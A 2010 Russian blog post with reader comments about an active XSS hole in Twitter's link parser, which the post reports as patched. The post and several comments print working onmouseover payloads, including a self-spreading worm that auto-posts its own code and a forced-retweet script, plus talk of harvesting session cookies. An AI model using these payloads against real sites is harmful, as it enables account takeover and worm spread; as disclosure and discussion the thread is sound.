21 сентября 2010 в 14:38

Активная XSS на Twitter

Скриншот (спасибо lc0d3r):

image
Пример: twitter.com/mr_the/status/25105420721 (там только alert)

Началось всё отсюда (банальное раскрашивание через css) twitter.com/RainbowTwtr, автор не известен.

Достаточно отпостить твитт вида:
http://twitter.com/mr_the#@"onmouseover="jAvascript:alert('Ha-ha! XSS!');"/
и будет много-много радости.

Собственно причина — плохой парсер ссылок, без должной фильтрации.

В целях безопасности, рекомендую временно отключить выполнение JavaScript на twitter.com.

UPD: В NewTwitter xss не работает.
UPD2: На 15:52 (по Киеву) закрыли возможность отправлять подобные твитты. Старые всё ещё работают.
UPD3: 16:46 по Киеву, уязвимость официально закрыли — status.twitter.com/post/1161435117/xss-attack-identified-and-patched
+107
383
15
mrThe 19,8

Комментарии (105)

+2
n3m0, #
Молодец!

Фильтруйте все данные приходящие от пользователя!!!
+1
ShamanS, #
В NewTwitter — работает все еще! При открытии нет, но когда идет обновление, через каждые n секунд выдается alert.
0
gladkij, #
Мне вот такую штуку послали (пробел после http надо убрать):

http ://t.co/@«onmouseover=»document.getElementById('status').value='RT MoiMrJack';$('.status-update-form').submit();«font-size:500pt;/
+1
halkfild, #
Это такой маркетинговый ход, чтобы все переходили на новую версию твиттера, так как там это не работает :)

Кстати, так можно спастить от бага до офф. фикса
+3
mrThe, #
Проблема в том, что возможность перейти на новый твиттер есть далеко не у всех)
+1
avatar2009, #
А у кого?
+2
mrThe, #
У избранных великим рандомом! Во всяком случае, в моей ленте новый твиттер может включить всего несколько человек, включая меня.
0
hesherr, #
А как ты его включаешь? Через настройки?
0
homm, #
А как вообще узнать, есть у меня эта возможность, или нет?
+7
mrThe, #
Сверху появится вот такая кнопочка:
+1
avatar2009, #
Может, если подделать кнопочку у себя, она и у других включится?
0
mrThe, #
Проверяли уже — не включается. По клику идёт вот такое обращение: twitter.com/account/use_phx?setting=true
Попробуйте, вдруг получится.
0
avatar2009, #
Все-таки нет. Ничего, скоро и на нашей улице будет праздник.
0
DeeZ, #
А у меня сработало и включилось. Спасибо!
Предложения как на скриншоте выше у меня не было.
+2
mrThe, #
Кстати, у меня это предложение блокировал один из плагинов)
0
hesherr, #
Понятно, спасибо!
+7
greengarlic, #
хреноватенькие тестеры у них
0
Dr_Logic, #
Им походу нужно форсировать распространение новой версии. Если она так долго по серверам ползет, как долго будет распространяться фикс?
+1
Dr_Logic, #
А ведь стоит написать короткий скрипт, и добавить к нему трендовый хештег — и можно насобирать кучу кукисов. Кукисы с твиттера чегонибудь дают?
–1
SvnWeb, #
сморя че в них хранится
0
alekztrz, #
Авторизация хранится. Можно зайти под чужим аккаунтом, подменив куки.
+3
noRerih, #
некоторые сайты используют для авторизации твиттеровский OAuth
0
loshvitalik, #
Так, черт, я туплю :) Пытался дотянуться до крестика вкладки, проводя мышь напрямую, через ссылку, уберите это :)
0
Zubchick, #
Разноцветные твиты twitter.com/RainbowTwtr появились у меня на странице, сразу все одновременно, хотя я этого RainbowTwtr не фоловил. Через минуту они исчезли.
+2
jtraub, #
Значит кто-то из тех кого вы фолловите ретвитнул сообщения RainbowTwtr, а потом нажал Undo
+3
biophreak, #
twitter.com/biophreak у меня теперь настоящий коммунистический твиттер (:
+1
homm, #
А теперь то же самое с хеш-тегом, например #prinsjesdag
0
biophreak, #
с хештегом не работает — постит текстом… либо у меня руки не оттуда :)
Можете попробовать, если че:
twitter.com/thenickname#@"style="background-color:red;color:red;position:fixed;left:0;top:0;width:100%;height:100%;z-index:9999999"/
0
Ag0nizer, #
Баги твиттера иногда задалбывают. Вроде кучу денег вложили в проект, почему так трудно довести его до ума?
+12
Requilence, #

Переходим на CSS3 ;-)
+17
Requilence, #
Новый тренд. Самое впечатляющее JS-приложение в 140 символах.
+1
biophreak, #
меньше, там еще ссылка, собачка, решетка, и мелочи всякие (:
0
land, #
возвращаемся к временам ASM, приложение в минимальном количестве символов )
0
n3m0, #
Я вижу используют эту xss. Давайте хоть тег писать #twitter_xss?
+2
land, #
символов и так мало ))
0
dohlik, #
Noscript как бе говорит «пофигу» ))
НЛО прилетело и опубликовало эту надпись здесь
+2
mcm69, #
всё, черви пошли. не ходите на вебморду
+6
homm, #
Twi-вирус:
http: //a.no/@"onmouseover=";$('textarea:first').val
(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/
0
chaliy, #
Аха, уже вся лента забита. Прикольно.
+1
gl00k, #
Мне пришел авторетвит: habreffect.ru/files/ba1/06e3909e1/rt.png
Наводишь мышку и автоматом ретвитишь.
0
biophreak, #
А никто не пробовал еще размещать js на внешних ресурсах и подгружать их?
0
artem_kovardin, #
хм…
0
biophreak, #
просто в таком случае можно-же будет вешать события не на mouseover, а, скажем на mousemove и так далее
0
land, #
ссылка выше на twitter.com/superbacker у него есть такие попытки, наводить проверять не стал )))
0
biophreak, #
Ха, работает… бугагашенька…
0
lol2Fast4U, #
+1
artem_kovardin, #
Мужики, хорош херней страдать! Лента в твиттере уже совсем нечитаема
0
biophreak, #
ну когда еще такое будет… ща наиграются все и надоест )
+1
biophreak, #
это же старая дырка… там клиент не фильтровался вроде.
0
mrThe, #
Это старая уязвимость.
НЛО прилетело и опубликовало эту надпись здесь
–1
Volgarik, #
это не акк балуется, а твивирус распространется.
НЛО прилетело и опубликовало эту надпись здесь
–1
voidby, #
А какой командой удаляются аккаунты? :)
0
Volgarik, #
Сейчас лучше вообще не заходить на веб-морду, запросто вирусняк подцепишь.
+1
lol2Fast4U, #
Хватит во зло использовать, смотрите и радуйтесь: twitter.com/myfreeweb/statuses/25112218506
0
Demir0, #
Что там было?)
+1
lol2Fast4U, #
+1
dima_smol, #
В ленте пипец просто настал.
Спас Firebug…
–5
GliX, #
Я понимаю когда найденную довольно опасную уязвимость используют обычные пользователи. Но когда крупная компания, которая стремилась создать себе на Хабре «имя» тоже начинает грешить этим — это переходит все грани. И этой самой фирмой, как ни удивительно, снова оказалась Вконтакте. Вот скриншот:



А вот тут можно глянуть исходный код, дабы исключить фальсификации. И я даже догадываюсь кто это сделал.
+6
Volgarik, #
крупная компания грешит ламерством
–2
GliX, #
Это весьма заметно. Сообщение больше 10 минут не удалялось, да и почти одновременно последовавший ретвит несколько другого сообщения от самого Цыплухина как бы намекает. Понабирали по объявлениям…
0
javac, #
Дуров, кто-же еще =)
+9
antanubis, #
Забавно, даже когда пишут пост о критической уязвимости на сайте twitter.com, доблестные хабра-юзеры умудряются найти повод написать про то, какой нехороший сайт vkontakte.ru.
+3
ajaxtelamonid, #
так это они зашли в свой твиттер через морду и словили хак, который отретвитился дальше, разве нет?
0
hellveen, #
Хотите сказать, что Вконтакте преднамеренно это сделала?
–1
GliX, #
За менее чем десять минут можно было сообщение удалить? Вроде как люди не совсем далекие от темы, должны были сообразить что это значит.
0
Assoulter, #
Попался два раза на авторетвите. Firebug помог.
А вообще, mobile.twitter.com и никаких глюков в веб-морде :)
0
Centro, #
«В целях безопасности, рекомендую временно отключить выполнение Javascript на twitter.com.»
Твиттер без скрипта не работает.
0
Centro, #
В целях безопасности сейчас лучше всего использовать внешние клиенты.
0
Pechkin1007, #
Вся лента теперь в этих отправлениях.
НЛО прилетело и опубликовало эту надпись здесь
+5
xoralex, #
новая твиттер версия упячка
0
EvgeniyLazarev, #
Всё, уже вылечили.

Кто-нибудь может подсказать, как расшифровываются подобные строки? (переходить не рекомендую, возможно вирус):
http:\u002f\u002fis.gd\u002ffl9A7
0
hormold, #
0
Volgarik, #
старые посты продолжают действовать
0
ArtemPugachev, #
<script language="javascript">
	document.write('http:\u002f\u002fis.gd\u002ffl5d3')
</script>
+1
ArtemPugachev, #
сорри, это был ответ на сообщение EvgeniyLazarev
0
Sma11erM1nd, #
0
Jeditobe, #
Что оно делает?
–4
DYPA, #
уже достало говорить что пора юзать dabr.co.uk или sexymonday.ru/dabr
+4
Volgarik, #
уже достало
+3
Maljar, #
Новое приложение Твиттера «RainbowTwtr» по популярности затмило «Ферму». ВКонтакте — рыдает :)
+1
XPyCT, #
+2
lol2Fast4U, #
Ты украл мой код! twitter.com/myfreeweb/statuses/25112218506 см. время
0
halkfild, #
Ну вот и пофиксили
+5
Mad_D, #
Ждём, когда @KremlinRussia ретвитнет радугу :)
0
MakeInstall, #
или @KermlinRussia :)
НЛО прилетело и опубликовало эту надпись здесь
+6
sidristij, #
Почему до сих пор нет Властелина?
0
WuWu, #
@ekozlov, @Unlevin, @alexa_cocacola — заставляют ретвить их посты скриптом всех кто за ними следует. Побанить бы их всех за такое… Бедный твиттер
НЛО прилетело и опубликовало эту надпись здесь
НЛО прилетело и опубликовало эту надпись здесь
0
ajaxtelamonid, #
Это не они, это скрипт сам рассылает эти твиты. Ретвитит сам себя и так распространяется.
+1
mirniy, #
Вообще-то уже браузер сам ретвитет кого угодно. Ахтунг. Закрываем твиттер и отдыхаем.
0
SergiuZZZ, #
У меня тоже браузер сам сделал ретвит кода, ретвитов 100+. при этом home, странно себя ведет, делает редирект на direct messages.
0
Demir0, #
Вот, это и я зацепил.
+1
homm, #
Я просто оставлю это здесь:
mobile.twitter.com/
НЛО прилетело и опубликовало эту надпись здесь
+1
root_sashok, #
Я горжусь, что меня фолловит @mr_the :D
+2
XPyCT, #
Пофиксили. Расходимся (:
–7
spam, #
кому это интересно? Твиттеры вместе с вконтактами пора поставить на пыльную полочку и забыть о них.
+1
donlimon, #
А у меня после всех этих забав, главная твиттера выглядит вот так,

Только зарегистрированные пользователи могут оставлять комментарии.
Войдите, пожалуйста.